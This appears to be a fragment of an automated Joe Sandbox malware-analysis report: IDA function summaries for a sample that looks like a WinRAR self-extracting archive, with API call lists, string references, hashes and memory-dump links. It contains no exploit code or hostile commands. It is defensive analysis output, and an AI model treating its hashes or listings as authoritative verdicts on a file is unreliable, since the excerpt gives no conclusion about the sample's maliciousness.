Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 1048086575-3710569615
Opcode ID: cf857dfdb846402a04b639880a0f56ecddc48e970ed32f05d0be7d60c6edf358
Instruction ID: 1ca64efcf6da51ac5e4d5fb9b1a9db2096e1a6de34f35ea50a0f5540b8a9c9a2
Opcode Fuzzy Hash: cf857dfdb846402a04b639880a0f56ecddc48e970ed32f05d0be7d60c6edf358
Instruction Fuzzy Hash: CB128771A18F8285FB10AB25FC412BAE361FF857A4F804135DA5D47AA5EF3CE548E720

Function 00007FF71612A4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF71612A504

Part of subcall function 00007FF716130F68: WideCharToMultiByte.KERNEL32 ref: 00007FF716130F99

SetDlgItemTextW.USER32 ref: 00007FF71612A573
GetWindowRect.USER32 ref: 00007FF71612A5AD
GetClientRect.USER32 ref: 00007FF71612A5BB
GetWindowLongPtrW.USER32 ref: 00007FF71612A66C
GetWindowRect.USER32 ref: 00007FF71612A6B2
SetDlgItemTextW.USER32 ref: 00007FF71612A6EC
GetSystemMetrics.USER32 ref: 00007FF71612A6F7
GetWindow.USER32 ref: 00007FF71612A708
GetWindowRect.USER32 ref: 00007FF71612A746
GetWindow.USER32 ref: 00007FF71612A808

Strings

$%s:, xrefs: 00007FF71612A4EF
CAPTION, xrefs: 00007FF71612A6CF

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
String ID: $%s:$CAPTION
API String ID: 1936833115-404845831
Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction ID: d015a23e435787f9e64b46a0336d93faaf89dc47f6faf754ad2d8f1ef33d04b3
Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction Fuzzy Hash: 1191D632B18A4286F718AF39BC0066AE7A1FB84794F905535EE4D47B58DF3CE809CB10

Function 00007FF716138624 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNELBASE ref: 00007FF71613863D
SizeofResource.KERNEL32 ref: 00007FF716138659
LoadResource.KERNEL32 ref: 00007FF716138673
LockResource.KERNEL32 ref: 00007FF716138685
GlobalAlloc.KERNELBASE ref: 00007FF7161386A6
GlobalLock.KERNEL32 ref: 00007FF7161386BB
GdipAlloc.GDIPLUS ref: 00007FF7161386FE
GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF716138769
GlobalUnlock.KERNEL32 ref: 00007FF71613878C
GlobalFree.KERNEL32 ref: 00007FF716138795

Strings

PNG, xrefs: 00007FF71613862F

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction ID: a644f0370fcc7b91dd9c459b209a960ac1fcb7db143d2039af7ca2db587c8684
Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction Fuzzy Hash: 3C412E25B19F0281FA84AB66AC4437AE7A1AF85BB0F854435CD0E47364EF7CD44CD720

Function 00007FF71611F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716121239
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612123F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716121245
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612124B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716121251
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716121257
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612125D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716121263

Strings

__tmp_reference_source_, xrefs: 00007FF71611FCCF, 00007FF71611FCDE

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: __tmp_reference_source_
API String ID: 3668304517-685763994
Opcode ID: 01d915aa7671a4fc05364d19b5dc884dc9aa7e92a75a406f9595f649af81a8c0
Instruction ID: 22767bf929e583c4d8bb1faaed8563d1b73044fd29af479202301941be2cfe81
Opcode Fuzzy Hash: 01d915aa7671a4fc05364d19b5dc884dc9aa7e92a75a406f9595f649af81a8c0
Instruction Fuzzy Hash: EFE27562A08AC296FA64EB35F8403AFE762FB41760F904136DB9D036A5DF3CE459D710

Function 00007FF716114840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611511E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716115124
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611512A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716115E16
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716115E1C

Strings

CMT, xrefs: 00007FF7161159B2

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: CMT
API String ID: 3668304517-2756464174
Opcode ID: 55bf8bc242d77ff464b4b637a4409c1e03917795df1080568c491ddd117196ec
Instruction ID: 2db13866680f2d4589da2f9203b7bba744cf9f98b8e4e9da2b4d8f4e1b343c1e
Opcode Fuzzy Hash: 55bf8bc242d77ff464b4b637a4409c1e03917795df1080568c491ddd117196ec
Instruction Fuzzy Hash: D8E2F7A2B09A8286FB14EB75E8502FFE7A1FB457A4F844035DA5E43695DF3CE058D320

Function 00007FF7161240BC Relevance: 10.7, APIs: 7, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00007FF71612410B
FindFirstFileW.KERNELBASE ref: 00007FF71612415E
GetLastError.KERNEL32 ref: 00007FF7161241AF
FindNextFileW.KERNEL32 ref: 00007FF7161241D7
GetLastError.KERNEL32 ref: 00007FF7161241E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612430F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716124315

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
String ID:
API String ID: 474548282-0
Opcode ID: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
Instruction ID: b30bc2bed522e144d35007d61454b23541ce2ff8d3f104f48b7b220602727137
Opcode Fuzzy Hash: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
Instruction Fuzzy Hash: E761B862A09E4185FA10AB29FC4027EA372FB957B4F905335EAAD436D9DF3CD488D710

Function 00007FF716115E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON

Download Yara Rule

Strings

CMT, xrefs: 00007FF7161159B2, 00007FF71611675B

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: bb8f32dfb39c41a2f4cffe25f113d86e3364d78267da2167cd0a984ef8db8d77
Instruction ID: 804825779e8fd4825430530799b4842ed78bf1b11ab7c7a2eb4be9347d96d5f2
Opcode Fuzzy Hash: bb8f32dfb39c41a2f4cffe25f113d86e3364d78267da2167cd0a984ef8db8d77
Instruction Fuzzy Hash: 5142E3A2B08A8187FB18EB74E9502FEA7A1EB11364F800536DB5E53696DF3CE45CD350

Function 00007FF716131F20 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d815108fe1d55ff87d4c2cc37bd82faefe2d830e8a86587ef2118bcfed6bbcfe
Instruction ID: a5140f827587b21f8b7210f44033972b8684dd0107d4e01ce212365e79b61057
Opcode Fuzzy Hash: d815108fe1d55ff87d4c2cc37bd82faefe2d830e8a86587ef2118bcfed6bbcfe
Instruction Fuzzy Hash: A3E11626A09A828AFB60EF28B8442BEB790FB48768F444135DB8F47745DE3CE549D314

Function 00007FF716133484 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9f1d4af68ebc00f7ab7abf4cea58f5074969ee2768498b55c72978f68bcf28
Instruction ID: 5fea727997cc3ddfcc5bc9c0c58b315baf98b2d6382fdedde75a758f6fc7ab65
Opcode Fuzzy Hash: 3d9f1d4af68ebc00f7ab7abf4cea58f5074969ee2768498b55c72978f68bcf28
Instruction Fuzzy Hash: ECB1D5A2B05BC592EE58EA66E9087EAA391F705FE4F848036DE0E07741DF3CE159D314

Function 00007FF716124928 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID:
API String ID: 3340455307-0
Opcode ID: 645ce3c779993beb1afb80abf8d7c73334c7791ae0f497f4c6919d42dc23d689
Instruction ID: 6c12528a9332316c328a87728d302b37be018f31942e53d4b86fdc8201048b66
Opcode Fuzzy Hash: 645ce3c779993beb1afb80abf8d7c73334c7791ae0f497f4c6919d42dc23d689
Instruction Fuzzy Hash: 4F41F622B16A5286FB64EF21FD4076BA263BBC4B94F944038DE4E07794DE3CE44A9714

Function 00007FF71612DFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E018
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E030
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E05D
CreateFileW.KERNEL32 ref: 00007FF71612E3F0
SetFilePointer.KERNEL32 ref: 00007FF71612E40E
ReadFile.KERNEL32 ref: 00007FF71612E436

Part of subcall function 00007FF71612DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF71612DDDF

CompareStringW.KERNELBASE ref: 00007FF71612E559
CloseHandle.KERNEL32 ref: 00007FF71612E4F3

Part of subcall function 00007FF716111FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716111FFB

Part of subcall function 00007FF7161251A4: GetVersionExW.KERNEL32 ref: 00007FF7161251D5

Part of subcall function 00007FF71612DFD0: LoadLibraryW.KERNELBASE ref: 00007FF71612DEFF
Part of subcall function 00007FF71612DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612DFB5
Part of subcall function 00007FF71612DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612DFBB
Part of subcall function 00007FF71612DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612DFC1
Part of subcall function 00007FF71612DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612DFC7

AllocConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E74B
GetCurrentProcessId.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E755
AttachConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E75D
GetStdHandle.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E780
WriteConsoleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E799
Sleep.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E7A4
FreeConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E7AA
ExitProcess.KERNEL32 ref: 00007FF71612E7BB

Strings

SSPICLI.DLL, xrefs: 00007FF71612E09C
comres.dll, xrefs: 00007FF71612E0F4
rasadhlp.dll, xrefs: 00007FF71612E30F
secur32.dll, xrefs: 00007FF71612E1CD
dnsapi.DLL, xrefs: 00007FF71612E259
RpcRtRemote.dll, xrefs: 00007FF71612E363
samlib.dll, xrefs: 00007FF71612E2D7
ws2_32.dll, xrefs: 00007FF71612E0FF
ntmarta.dll, xrefs: 00007FF71612E1F7
dsrole.dll, xrefs: 00007FF71612E37F
atl.dll, xrefs: 00007FF71612E136
dfscli.dll, xrefs: 00007FF71612E2F3
setupapi.dll, xrefs: 00007FF71612E141
userenv.dll, xrefs: 00007FF71612E15D
imageres.dll, xrefs: 00007FF71612E24B
ws2help.dll, xrefs: 00007FF71612E10A
srvcli.dll, xrefs: 00007FF71612E221
cryptsp.dll, xrefs: 00007FF71612E355
uxtheme.dll, xrefs: 00007FF71612E66D
netutils.dll, xrefs: 00007FF71612E283
samcli.dll, xrefs: 00007FF71612E2C9
dwmapi.dll, xrefs: 00007FF71612E0BD, 00007FF71612E661
UXTheme.dll, xrefs: 00007FF71612E0B2
shell32.dll, xrefs: 00007FF71612E1BF
cabinet.dll, xrefs: 00007FF71612E1DB
devrtl.dll, xrefs: 00007FF71612E29F
mpr.dll, xrefs: 00007FF71612E291
apphelp.dll, xrefs: 00007FF71612E14F
kernel32, xrefs: 00007FF71612E011
ntshrui.dll, xrefs: 00007FF71612E12B
slc.dll, xrefs: 00007FF71612E23D
crypt32.dll, xrefs: 00007FF71612E187
rsaenh.dll, xrefs: 00007FF71612E0A7
wkscli.dll, xrefs: 00007FF71612E2E5
dhcpcsvc.dll, xrefs: 00007FF71612E32B
linkinfo.dll, xrefs: 00007FF71612E347
usp10.dll, xrefs: 00007FF71612E0DE
cscapi.dll, xrefs: 00007FF71612E22F
SetDefaultDllDirectories, xrefs: 00007FF71612E053
cryptbase.dll, xrefs: 00007FF71612E0C8
sfc_os.dll, xrefs: 00007FF71612E091
msasn1.dll, xrefs: 00007FF71612E195
propsys.dll, xrefs: 00007FF71612E2AD
version.dll, xrefs: 00007FF71612E07B
cryptui.dll, xrefs: 00007FF71612E1A3
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00007FF71612E73B
DXGIDebug.dll, xrefs: 00007FF71612E086, 00007FF71612E5B6
clbcatq.dll, xrefs: 00007FF71612E0E9
WINNSI.DLL, xrefs: 00007FF71612E275
mlang.dll, xrefs: 00007FF71612E2BB
wintrust.dll, xrefs: 00007FF71612E1B1
aclui.dll, xrefs: 00007FF71612E371
netapi32.dll, xrefs: 00007FF71612E16B
browcli.dll, xrefs: 00007FF71612E301
SetDllDirectoryW, xrefs: 00007FF71612E026
profapi.dll, xrefs: 00007FF71612E205
shdocvw.dll, xrefs: 00007FF71612E179
oleaccrc.dll, xrefs: 00007FF71612E1E9
ieframe.dll, xrefs: 00007FF71612E120
lpk.dll, xrefs: 00007FF71612E0D3
dhcpcsvc6.dll, xrefs: 00007FF71612E31D
psapi.dll, xrefs: 00007FF71612E115
iphlpapi.DLL, xrefs: 00007FF71612E267
WindowsCodecs.dll, xrefs: 00007FF71612E213
XmlLite.dll, xrefs: 00007FF71612E339
peerdist.dll, xrefs: 00007FF71612E38D

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
